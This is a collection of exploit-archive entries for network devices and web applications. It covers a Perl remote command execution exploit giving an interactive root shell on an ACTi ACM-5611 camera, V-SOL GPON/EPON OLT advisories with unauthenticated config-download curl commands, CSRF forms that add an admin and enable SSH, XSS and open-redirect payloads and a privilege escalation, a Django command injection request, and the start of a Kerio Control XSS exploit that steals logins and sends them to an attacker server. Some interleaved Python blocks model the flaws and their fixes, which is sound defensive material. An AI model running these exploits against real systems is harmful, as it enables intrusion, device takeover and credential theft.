# # [ /proc/14790/statm
# # [ /proc/14790/maps
# # [ /proc/14790/mem
# # [ /proc/14790/mounts
# # [ /proc/14791/environ
# # [ /proc/14791/status
# # [ /proc/14791/cmdline
# # [ /proc/14791/stat
# # [ /proc/14791/statm
# # [ /proc/14791/maps
# # [ /proc/14791/mem
# # [ /proc/14791/mounts
# # [ /proc/16682/environ
# # [ /proc/16682/status
# # [ /proc/16682/cmdline
# # [ /proc/16682/stat
# # [ /proc/16682/statm
# # [ /proc/16682/maps
# # [ /proc/16682/mem
# # [ /proc/16682/mounts
# # [ /proc/22978/environ
# # [ /proc/22978/status
# # [ /proc/22978/cmdline
# # [ /proc/22978/stat
# # [ /proc/22978/statm
# # [ /proc/22978/maps
# # [ /proc/22978/mem
# # [ /proc/22978/mounts
# # [ /proc/22979/environ
# # [ /proc/22979/status
# # [ /proc/22979/cmdline
# # [ /proc/22979/stat
# # [ /proc/22979/statm
# # [ /proc/22979/maps
# # [ /proc/22979/mem
# # [ /proc/22979/mounts
# # [ /proc/27240/environ
# # [ /proc/27240/status
# # [ /proc/27240/cmdline
# # [ /proc/27240/stat
# # [ /proc/27240/statm
# # [ /proc/27240/maps
# # [ /proc/27240/mem
# # [ /proc/27240/mounts
# # [ /proc/27241/environ
# # [ /proc/27241/status
# # [ /proc/27241/cmdline
# # [ /proc/27241/stat
# # [ /proc/27241/statm
# # [ /proc/27241/maps
# # [ /proc/27241/mem
# # [ /proc/27241/mounts
# # [ /proc/20414/environ
# # [ /proc/20414/status
# # [ /proc/20414/cmdline
# # [ /proc/20414/stat
# # [ /proc/20414/statm
# # [ /proc/20414/maps
# # [ /proc/20414/mem
# # [ /proc/20414/mounts
# # [ /proc/9117/environ
# # [ /proc/9117/status
# # [ /proc/9117/cmdline
# # [ /proc/9117/stat
# # [ /proc/9117/statm
# # [ /proc/9117/maps
# # [ /proc/9117/mem
# # [ /proc/9117/mounts
# # [ /proc/9120/environ
# # [ /proc/9120/status
# # [ /proc/9120/cmdline
# # [ /proc/9120/stat
# # [ /proc/9120/statm
# # [ /proc/9120/maps
# # [ /proc/9120/mem
# # [ /proc/9120/mounts
# # [ /sbin/dhcpcd
# # [ /sbin/ez-ipupdate
# # [ /sbin/htpasswd
# # [ /sbin/iperf
# # [ /sbin/thttpd
# # [ /usr/sbin/mount_nfs_drive
# # [ /usr/sbin/ll
# # [ /usr/sbin/system_info
# # [ /usr/sbin/read_dev_info
# # [ /usr/sbin/acti_config
# # [ /usr/sbin/show_progress
# # [ /usr/sbin/ddns_monitor
# # [ /usr/sbin/wan_status
# # [ /usr/sbin/adsl-connect
# # [ /usr/sbin/adsl-setup
# # [ /usr/sbin/acti_report
# # [ /usr/sbin/pppd
# # [ /usr/sbin/pppoe
# # [ /usr/sbin/acti_upgrade
# # [ /usr/sbin/thttpd_monitor
# # [ /usr/sbin/acti_485
# # [ /usr/sbin/dbg
# # [ /usr/sbin/ntpclient
# # [ /usr/sbin/acti_upgradem
# # [ /usr/sbin/dhcp_retry
# # [ /usr/sbin/pppoe_monitor
# # [ /usr/sbin/acti_reboot
# # [ /usr/sbin/acti_msg
# # [ /usr/sbin/mount_tmpfs
# # [ /usr/sbin/shell_relay
# # [ /usr/sbin/acti_logger
# # [ /usr/sbin/boot_ctrl
# # [ /usr/sbin/acti_gpio
# # [ /usr/sbin/acti_rs485
# # [ /usr/sbin/acti_rtc
# # [ /usr/sbin/acti_reg
# # [ /usr/sbin/conf_sync
# # [ /usr/sbin/conf_convert
# # [ /usr/sbin/bin2devinfo
# # [ /usr/sbin/audio_tester
# # [ /usr/sbin/bin2profile
# # [ /usr/sbin/acti-server
# # [ /usr/bin/setsid
# # [ /var/run/dev.bin
# # [ /var/run/system_type
# # [ /var/run/channel
# # [ /var/run/sys_conf.bin
# # [ /var/run/wan_state
# # [ /var/run/wanip_config
# # [ /var/run/encoder_run
# # [ /var/log/systemlog.txt
# # [ /var/log/wan_info_brief.txt
# # [ /var/log/system_info_web.txt
# # [ /var/log/system_info_url.txt
# # [ /var/www/images/Space.gif
# # [ /var/www/images/bar.gif
# # [ /var/www/images/bar2.gif
# # [ /var/www/images/icon.gif
# # [ /var/www/images/layout.gif
# # [ /var/www/images/r0-100.gif
# # [ /var/www/images/header_red.jpg
# # [ /var/www/images/ie_error.bmp
# # [ /var/www/images/r0-255.gif
# # [ /var/www/images/ptz_center_1.gif
# # [ /var/www/images/ptz_down_1.gif
# # [ /var/www/images/ptz_left_1.gif
# # [ /var/www/images/ptz_leftdown_1.gif
# # [ /var/www/images/ptz_leftup_1.gif
# # [ /var/www/images/ptz_right_1.gif
# # [ /var/www/images/ptz_rightdown_1.gif
# # [ /var/www/images/ptz_rightup_1.gif
# # [ /var/www/images/ptz_up_1.gif
# # [ /var/www/images/add.jpg
# # [ /var/www/images/delete.jpg
# # [ /var/www/images/focusin.jpg
# # [ /var/www/images/focusout.jpg
# # [ /var/www/images/home.jpg
# # [ /var/www/images/reset.jpg
# # [ /var/www/images/tele.jpg
# # [ /var/www/images/wide.jpg
# # [ /var/www/images/Num00.jpg
# # [ /var/www/images/Num01.jpg
# # [ /var/www/cgi-bin/cmd/system
# # [ /var/www/cgi-bin/cmd/mpeg4
# # [ /var/www/cgi-bin/cmd/encoder
# # [ /var/www/cgi-bin/cmd/.htpasswd
# # [ /var/www/cgi-bin/80503736
# # [ /var/www/cgi-bin/update
# # [ /var/www/cgi-bin/updatem
# # [ /var/www/cgi-bin/macdev
# # [ /var/www/cgi-bin/system
# # [ /var/www/cgi-bin/mpeg4
# # [ /var/www/cgi-bin/test
# # [ /var/www/cgi-bin/encoder
# # [ /var/www/cgi-bin/web1.cgi
# # [ /var/www/default.css
# # [ /var/www/index.htm
# # [ /var/www/profile/cze.bin
# # [ /var/www/profile/dan.bin
# # [ /var/www/profile/eng.bin
# # [ /var/www/profile/fin.bin
# # [ /var/www/profile/fre.bin
# # [ /var/www/profile/ger.bin
# # [ /var/www/profile/hun.bin
# # [ /var/www/profile/ita.bin
# # [ /var/www/profile/jap.bin
# # [ /var/www/profile/lang_table.bin
# # [ /var/www/profile/por.bin
# # [ /var/www/profile/sch.bin
# # [ /var/www/profile/spa.bin
# # [ /var/www/profile/tch.bin
# # [ /var/www/nvEPLMedia.ocx
# # [ /var/www/pid
# # [ #
# #

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;   # rand_ua(): pick a random real-browser User-Agent
use HTML::TreeBuilder;
$| = 1;                       # unbuffered STDOUT, needed for the interactive prompt

print "\033[2J";   # clear the screen
print "\033[0;0H"; # jump to 0,0

print "[ ACTi ACM-5611 Video Camera Remote Command Execution Exploit
[ ============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
";

if (not defined $ARGV[0]) {
    print "[ Usage: perl $0 [target]\n";
    print "[ Example: perl $0 192.168.1.1\n\n";
    exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0] : 'http://' . $ARGV[0];

my $user_agent = rand_ua("browsers");
my $browser    = LWP::UserAgent->new();
$browser->timeout(10);
$browser->agent($user_agent);

# Step 1: fingerprint. The camera's thttpd serves a directory index of
# /cgi-bin/ without authentication; the listing doubles as an inventory of
# every CGI on the device (the file list in the comment block above came
# from this step).
my $target   = $host . "/cgi-bin/";
my $request  = HTTP::Request->new(GET => $target, [Content_Type => "application/x-www-form-urlencoded", Referer => $host]);
my $response = $browser->request($request);
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');

if (defined($response->as_string()) && $response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/) {
    print "[ Server: ", $response->header('Server'), "\n";
    print "[ The target is vulnerable\n";
    print "[\n[ Directory Traversal\n";
    my $tree  = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    print "[ ", $host . $_->attr('href'), "\n" for @files;
    print "[\n[ Got root?\n";

    # Step 2: command execution. /cgi-bin/test hands its 'iperf' parameter
    # to a shell, so a leading ';' ends the intended command and runs ours;
    # the CGI's output comes back in the response body.
    while (1) {
        print "[ \# ";
        my $cmd = <STDIN>;
        exit unless defined $cmd;   # EOF (Ctrl-D) ends the session cleanly
        chomp $cmd;
        if ($cmd eq "clear") { system $^O eq 'MSWin32' ? 'cls' : 'clear'; }
        exit if $cmd eq 'exit';

        my $target   = $host . "/cgi-bin/test?iperf=;" . $cmd;
        my $request  = HTTP::Request->new(GET => $target, [Content_Type => "application/x-www-form-urlencoded", Referer => $host]);
        my $response = $browser->request($request) or die "[ Exploit Failed: $!";
        print "[ ", $_, "\n" for split(/\n/, $response->content());
    }
} else {
    print "[ Exploit failed! The target isn't vulnerable\n";
    exit;
}

V-SOL GPON/EPON OLT Platform 2.03 Unauthenticated Configuration Download


V-SOL GPON/EPON OLT Platform version 2.03 suffers from an unauthenticated configuration download vulnerability.


MD5 | fe152994b0410c54dd85432f305cb715


V-SOL GPON/EPON OLT Platform v2.03 Unauthenticated Configuration Download


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
configuration download and information disclosure vulnerability when direct
object reference is made to the usrcfg.conf file using an HTTP GET method. This
will enable the attacker to disclose sensitive information and help her in
authentication bypass, privilege escalation and/or full system access.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5534
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php

25.09.2019

--


1# curl http://192.168.8.200/device/usrcfg.conf
2# curl http://192.168.8.201/action/usrcfg.conf
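The two curl lines above are the entire PoC. As an added example, not code from the ZSL advisory, the following Python probes both documented paths without credentials and decides whether what came back is the configuration file rather than GoAhead's login page or an error. The decision rule in looks_like_exposed_config and the keyword list in interesting_lines are assumptions, since the advisory does not describe the usrcfg.conf format; the two sample bodies are constructed for the offline check.

```python
import urllib.error
import urllib.request

# Paths named in the advisory; both served the file unauthenticated.
CONFIG_PATHS = ("/device/usrcfg.conf", "/action/usrcfg.conf")

# Assumed keywords: the advisory does not document the usrcfg.conf format.
SENSITIVE_KEYWORDS = ("user", "pass", "secret", "snmp", "community", "enable")

# Constructed sample bodies for the offline check (not real device output).
SAMPLE_CONFIG = "hostname OLT\nusername admin password admin\nvlan 100\n"
SAMPLE_LOGIN_PAGE = "<!DOCTYPE html><html><body><form>login</form></body></html>"


def looks_like_exposed_config(status, content_type, body):
    """True when a response is plausibly the raw config rather than GoAhead's
    login page or an error. Heuristic (an assumption): HTTP 200 and a
    non-empty body that is neither served nor shaped as an HTML document."""
    if status != 200 or not body.strip():
        return False
    if "text/html" in (content_type or "").lower():
        return False
    head = body.lstrip()[:512].lower()
    return not (head.startswith(("<!doctype", "<html")) or "<form" in head)


def interesting_lines(body, keywords=SENSITIVE_KEYWORDS):
    """Lines worth a closer look (credentials, community strings, ...)."""
    return [ln for ln in body.splitlines()
            if any(k in ln.lower() for k in keywords)]


def probe_olt(base_url, paths=CONFIG_PATHS, timeout=5):
    """Request each path without credentials; return (path, body) for the
    first one that looks like the config, or None. Does network I/O, so it
    is not exercised by the offline check."""
    for path in paths:
        req = urllib.request.Request(base_url.rstrip("/") + path,
                                     headers={"User-Agent": "Mozilla/5.0"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
                ctype = resp.headers.get("Content-Type", "")
                if looks_like_exposed_config(resp.status, ctype, body):
                    return path, body
        except (urllib.error.URLError, OSError):
            continue
    return None


if __name__ == "__main__":
    import sys
    hit = probe_olt(sys.argv[1] if len(sys.argv) > 1 else "http://192.168.8.200")
    if hit:
        print(f"[+] {hit[0]} exposed; {len(interesting_lines(hit[1]))} sensitive lines")
    else:
        print("[-] no unauthenticated config download")
```

The classifier matters because GoAhead devices commonly answer an unauthenticated request with HTTP 200 and the login page, so status alone would produce false positives across a fleet scan.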

V-SOL GPON/EPON OLT Platform 2.03 Link Manipulation


V-SOL GPON/EPON OLT Platform version 2.03 suffers from a link manipulation vulnerability.


MD5 | 5cea90218187ba10520f17a600a8536f


V-SOL GPON/EPON OLT Platform v2.03 Link Manipulation Vulnerability


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: Input passed via the 'parent' GET parameter in 'bindProfile.html' script
is not properly verified before being used to redirect users. This can be
exploited to redirect a logged-in user to an arbitrary website e.g. when a
user clicks a specially crafted link to the affected script hosted on a trusted
domain.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5535
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5535.php

25.09.2019

--


CSRF URL Redirect request:

GET /action/bindProfile.html?parent=https://zeroscience.mk/index
Host: 192.168.8.200


Response:

HTTP/1.1 200 OK
Location: https://zeroscience.mk/index.html?select=0

V-SOL GPON/EPON OLT Platform 2.03 Cross Site Request Forgery


V-SOL GPON/EPON OLT Platform version 2.03 suffers from a cross site request forgery vulnerability.


MD5 | 3984bdb37b70ac28c71fd67b0602e997


V-SOL GPON/EPON OLT Platform v2.03 Cross-Site Request Forgery


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5536
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php

25.09.2019

--


CSRF add admin:
---------------

<html>
<body>
<form action="http://192.168.8.200/action/user.html" method="POST">
<input type="hidden" name="user_name_add" value="Spy" />
<input type="hidden" name="user_password_add" value="pass123" />
<input type="hidden" name="password_confirm_add" value="pass123" />
<input type="hidden" name="user_role" value="1" />
<input type="hidden" name="user_name_mod" value="" />
<input type="hidden" name="user_password_mod" value="" />
<input type="hidden" name="password_confirm_mod" value="" />
<input type="hidden" name="user_role_mod" value="0" />
<input type="hidden" name="option_um" value="100/" />
<input type="hidden" name="who" value="0" />
<input type="submit" value="Init" />
</form>
</body>
</html>


CSRF enable SSH:
----------------

<html>
<body>
<form action="https://192.168.8.200/action/sshglobal.html" method="POST">
<input type="hidden" name="ssh_enable" value="1" />
<input type="hidden" name="ssh_version" value="2" />
<input type="hidden" name="auth_retries" value="6" />
<input type="hidden" name="ssh_timeout" value="120" />
<input type="hidden" name="ssh_modulus" value="2048" />
<input type="hidden" name="who" value="0" />
<input type="submit" value="Init" />
</form>
</body>
</html>


V-SOL GPON/EPON OLT Platform 2.03 Cross Site Scripting


V-SOL GPON/EPON OLT Platform version 2.03 suffers from multiple cross site scripting vulnerabilities.


MD5 | 161ad7796bb183c01e640765c590c2f4


V-SOL GPON/EPON OLT Platform v2.03 Reflected XSS Vulnerability


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: The application is prone to multiple reflected cross-site scripting
vulnerabilities due to a failure to properly sanitize user-supplied input
to several parameters that are handled by various scripts. Attackers can
exploit this issue to execute arbitrary HTML and script code in a user's
browser session.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5537
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5537.php

25.09.2019

--


GET /action/bindProfile.html?parent="><script>confirm(251)</script>&gponid=2&gonuid=7
GET /action/ntp.html?sntp_en=1&time_zone=05%3A30&sntp_server="><script>confirm(251)</script>&who=0
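The 'parent' parameter of bindProfile.html is abused twice on this page: as an open redirect (ZSL-2019-5535, where parent=https://zeroscience.mk/index produced Location: https://zeroscience.mk/index.html?select=0) and as a reflected XSS sink (ZSL-2019-5537, with a "> break-out). The following Python is an added example, not V-SOL's code: it models the observed behaviour of the handler and places a hardened version beside it. The model's template, the function names and the PARENT_ALLOWLIST page names other than 'index' are assumptions; the inputs are the advisory's own PoC values.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed allow-list of page names 'parent' may refer to. 'index' comes from
# the advisory's response (Location: .../index.html?select=0); the rest are guesses.
PARENT_ALLOWLIST = frozenset({"index", "onu", "profile"})

# PoC values taken from the two advisories.
REDIRECT_POC = "https://zeroscience.mk/index"
XSS_POC = '"><script>confirm(251)</script>'


def vulnerable_bind_profile(parent):
    """Model of the observed behaviour: 'parent' is used verbatim as the
    redirect target and echoed into an attribute of the rendered page."""
    return {
        "Location": f"{parent}.html?select=0",
        "body": f'<a href="{parent}.html">Back</a>',
    }


def is_offsite(value):
    """True for anything that would leave the device: absolute URLs, scheme-only
    values such as javascript:, and protocol-relative //host forms. Backslashes
    are folded to slashes because browsers treat \\\\evil the same as //evil."""
    parts = urlsplit(value.replace("\\", "/"))
    return bool(parts.scheme or parts.netloc)


def safe_parent(parent, default="index"):
    """Reduce 'parent' to a bare page name from the allow-list; anything else
    (off-site URL, path separators, quotes, tags) falls back to the default."""
    if not parent or is_offsite(parent):
        return default
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", parent):
        return default
    return parent if parent in PARENT_ALLOWLIST else default


def hardened_bind_profile(parent):
    """Redirect only to the device's own /action/ pages and escape at the sink."""
    page = safe_parent(parent)
    # html.escape is redundant after the regex check but costs nothing and
    # keeps the template safe if the validation is ever loosened.
    return {
        "Location": f"/action/{page}.html?select=0",
        "body": f'<a href="/action/{html.escape(page, quote=True)}.html">Back</a>',
    }
```

Validating against an allow-list of page names rather than blocking known-bad prefixes is what closes both bugs at once: the redirect can no longer leave the device, and nothing that is not a plain identifier reaches the HTML.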

V-SOL GPON/EPON OLT Platform 2.03 Remote Privilege Escalation


V-SOL GPON/EPON OLT Platform version 2.03 suffers from a remote privilege escalation vulnerability.


MD5 | 9ffbb8b361484f30a575b6f38d2ef37a


V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation


Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
Product web page: https://www.vsolcn.com
Affected version: V2.03.62R_IPv6
V2.03.54R
V2.03.52R
V2.03.49
V2.03.47
V2.03.40
V2.03.26
V2.03.24
V1.8.6
V1.4

Summary: GPON is currently the leading FTTH standard in broadband access
technology being widely deployed by service providers around the world.
GPON/EPON OLT products are 1U height 19 inch rack mount products. The
features of the OLT are small, convenient, flexible, easy to deploy, high
performance. It is appropriate to be deployed in compact room environment.
The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
ICT applications.

Desc: The application suffers from a privilege escalation vulnerability.
A normal (non-admin) user can elevate his/her privileges by sending an HTTP
POST request to user.html that sets the 'user_role_mod' parameter to the
integer value '1', gaining admin rights.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5538
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php

25.09.2019

--


<html>
<body>
<form action="http://192.168.8.200/action/user.html" method="POST">
<input type="hidden" name="user_name_add" value="" />
<input type="hidden" name="user_password_add" value="" />
<input type="hidden" name="password_confirm_add" value="" />
<input type="hidden" name="user_role" value="0" />
<input type="hidden" name="user_password_mod" value="test" />
<input type="hidden" name="password_confirm_mod" value="test" />
<input type="hidden" name="user_role_mod" value="1" />
<input type="hidden" name="option_um" value="17" />
<input type="hidden" name="who" value="1" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>
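The CSRF advisory (ZSL-2019-5536) and the privilege escalation advisory (ZSL-2019-5538) target the same user.html handler and come down to three missing server-side checks: no anti-CSRF token, no Origin check, and no test that the caller is an admin before a role is changed or an account created. The following Python is an added example, not V-SOL's firmware code: a framework-free model of that handler as observed, next to a hardened version with the three checks, driven by the two PoC form bodies from this page. The meaning assigned to 'who' (0 = add, 1 = modify) and the fall-back to the session's own account when user_name_mod is empty are assumptions; the role encoding (1 = admin) follows the PoC.

```python
import hmac
import secrets
from dataclasses import dataclass, field

USER, ADMIN = 0, 1                      # role encoding used by the PoC (user_role_mod=1)
DEVICE_ORIGIN = "http://192.168.8.200"  # the OLT's own origin, from the PoC forms

# The two PoC bodies from the advisories, as a browser would submit them.
PRIVESC_FORM = {"user_name_add": "", "user_password_add": "", "password_confirm_add": "",
                "user_role": "0", "user_password_mod": "test", "password_confirm_mod": "test",
                "user_role_mod": "1", "option_um": "17", "who": "1"}
ADD_ADMIN_FORM = {"user_name_add": "Spy", "user_password_add": "pass123",
                  "password_confirm_add": "pass123", "user_role": "1",
                  "user_name_mod": "", "user_password_mod": "", "password_confirm_mod": "",
                  "user_role_mod": "0", "option_um": "100/", "who": "0"}


@dataclass
class Session:
    username: str
    role: int
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def _apply(form, session, users):
    """State change shared by both handlers. 'who' selecting add (0) or
    modify (1) is an assumption about the firmware."""
    who = form.get("who")
    if who == "0":
        name = form.get("user_name_add", "")
        if not name or form.get("user_password_add") != form.get("password_confirm_add"):
            return 400
        users[name] = int(form.get("user_role", USER))
    elif who == "1":
        target = form.get("user_name_mod") or session.username   # assumption
        role = form.get("user_role_mod", "")
        if target not in users or not role.isdigit():
            return 400
        users[target] = int(role)
    else:
        return 400
    return 200


def vulnerable_user_post(session, form, users):
    """Observed behaviour: any logged-in session's POST is applied as-is."""
    return _apply(form, session, users)


def hardened_user_post(session, form, users, origin):
    """Same handler with the three missing checks in front of it."""
    if origin != DEVICE_ORIGIN:          # a cross-site form post carries the attacker's Origin
        return 403
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return 403
    if session.role != ADMIN:            # non-admins may only touch their own account, role unchanged
        target = form.get("user_name_mod") or session.username
        own_role = str(users.get(session.username, USER))
        if form.get("who") != "1" or target != session.username \
                or form.get("user_role_mod", own_role) != own_role:
            return 403
    return _apply(form, session, users)
```

The token comparison uses hmac.compare_digest so a per-session token cannot be recovered byte by byte through timing, and the authorization rule is expressed as what a non-admin is allowed to do (change their own password) rather than as a list of forbidden parameters, which is what makes 'user_role_mod=1' fail closed.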

thesystem 1.0 Command Injection


thesystem version 1.0 suffers from a command injection vulnerability.


MD5 | ae570470c14e8e29e496f8d9f1f29369

# Exploit Title: thesystem Command Injection 
# Author: Sadik Cetin
# Discovery Date: 2019-09-28
# Vendor Homepage: https://github.com/kostasmitroglou/thesystem
# Software Link: https://github.com/kostasmitroglou/thesystem
# Tested Version: 1.0
# Tested on OS: Windows 10
# CVE: N/A
# Type: Webapps
# Description:
# Simple command injection reachable without logging in: the run_command view is not decorated with login_required, so the login is bypassed entirely

POST /run_command/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------168279961491
Content-Length: 325
Connection: close
Referer: http://127.0.0.1:8000/run_command/
Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719
Upgrade-Insecure-Requests: 1
-----------------------------168279961491
Content-Disposition: form-data; name="csrfmiddlewaretoken"
7rigJnIFAByKlmo6NBD7R8Ua66daVjdfiFH16T7HxJrP43GhJ7m7mVAIFIX7ZDfX
-----------------------------168279961491
Content-Disposition: form-data; name="command"
ping 127.0.0.1
-----------------------------168279961491--

HTTP/1.1 200 OK
Date: Sat, 28 Sep 2019 09:42:26 GMT
Server: WSGIServer/0.2 CPython/3.5.3
Content-Length: 429
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

When I try to run the following commands, they all run:
dir
whoami
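The point of the advisory is not that run_command executes shell commands (that is the feature) but that the view is reachable by anyone because the login_required decorator was never applied. The following Python is an added example, not code from the thesystem project: a framework-free model of the view with a stand-in for Django's decorator, in both the unprotected form the advisory describes and the one-line fix. The User and Request classes mimic the Django attributes the view touches; fake_runner is a constructed stand-in so the offline check does not spawn a shell.

```python
import subprocess
from dataclasses import dataclass
from functools import wraps


@dataclass
class User:
    is_authenticated: bool = False      # mirrors django's request.user.is_authenticated


@dataclass
class Request:
    method: str
    POST: dict
    user: User


def login_required(view):
    """Stand-in for django.contrib.auth.decorators.login_required: anonymous
    callers are redirected to the login page and the view body never runs."""
    @wraps(view)
    def wrapper(request, *args, **kwargs):
        if not request.user.is_authenticated:
            return 302, "/login/?next=/run_command/"
        return view(request, *args, **kwargs)
    return wrapper


def run_command_view(request, runner=subprocess.run):
    """The feature itself: hand the submitted 'command' to a shell and return
    its output. 'runner' is injectable so the offline check can avoid a real
    shell; with the default it behaves like the application."""
    if request.method != "POST":
        return 405, ""
    cmd = request.POST.get("command", "").strip()
    if not cmd:
        return 400, ""
    proc = runner(cmd, shell=True, capture_output=True, text=True, timeout=30)
    return 200, proc.stdout + proc.stderr


# As the advisory describes it: the view is exposed without any check.
run_command_unprotected = run_command_view

# The fix: the decorator the project forgot to apply.
run_command_protected = login_required(run_command_view)


def fake_runner(cmd, **kwargs):
    """Constructed stand-in for subprocess.run used by the offline check."""
    return subprocess.CompletedProcess(args=cmd, returncode=0,
                                       stdout=f"ran: {cmd}\n", stderr="")
```

Note what the decorator does not change: an authenticated user still gets an arbitrary shell, which is by design for this project, so the access control on the route is the whole security boundary and deserves a test of its own (the csrfmiddlewaretoken in the captured request is irrelevant to an attacker who can simply fetch the form first).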

GFI Kerio Control 9.3.0 Cross Site Scripting


GFI Kerio Control firewall version 9.3.0 suffers from a cross site scripting vulnerability.


MD5 | 8549de7909e0e05df7576a5c6847a0f4

/* 
- DOM based XSS in Kerio Control Firewalls v9.3.0
- CVE-2019-16414
- Finder: Michael Eissele
- Description: hex-escaped characters (e.g. \x22 for a double quote) pass the input filter and are decoded where the NTLM parameter is reflected, opening up DOM based XSS.
- PoC Link to include exploit:
https://<--IP/domain of affected device-->/login/?NTLM=0\x22\x3e\x3c/script\x3e\x3cscript\x20src=\x22//<--URL to exploit.js -->/this.js\x22\x3e\x3c/script\x3e
- Exploit: PoC for stealing credentials in cleartext. The script manipulates the login page to capture the credentials and sends them to the attacker.
The victim is shown the regular error message for an invalid login.
- Save this file with a .js extension and host it on a server of your choice
- Run tail -fn 0 /var/log/apache2/access_www.your-server.com | grep "kerio_exploit" on YOUR machine (the GET request containing the credentials will show up there)
- only for educational purposes ;)
*/
// CHANGE THIS:
var pingbackURL='<-- attackers ip/domain for receiving credentials pingback -->'; // example: https://attackers-server.com or https://192.158.0.123
// ... exploit code starting here:
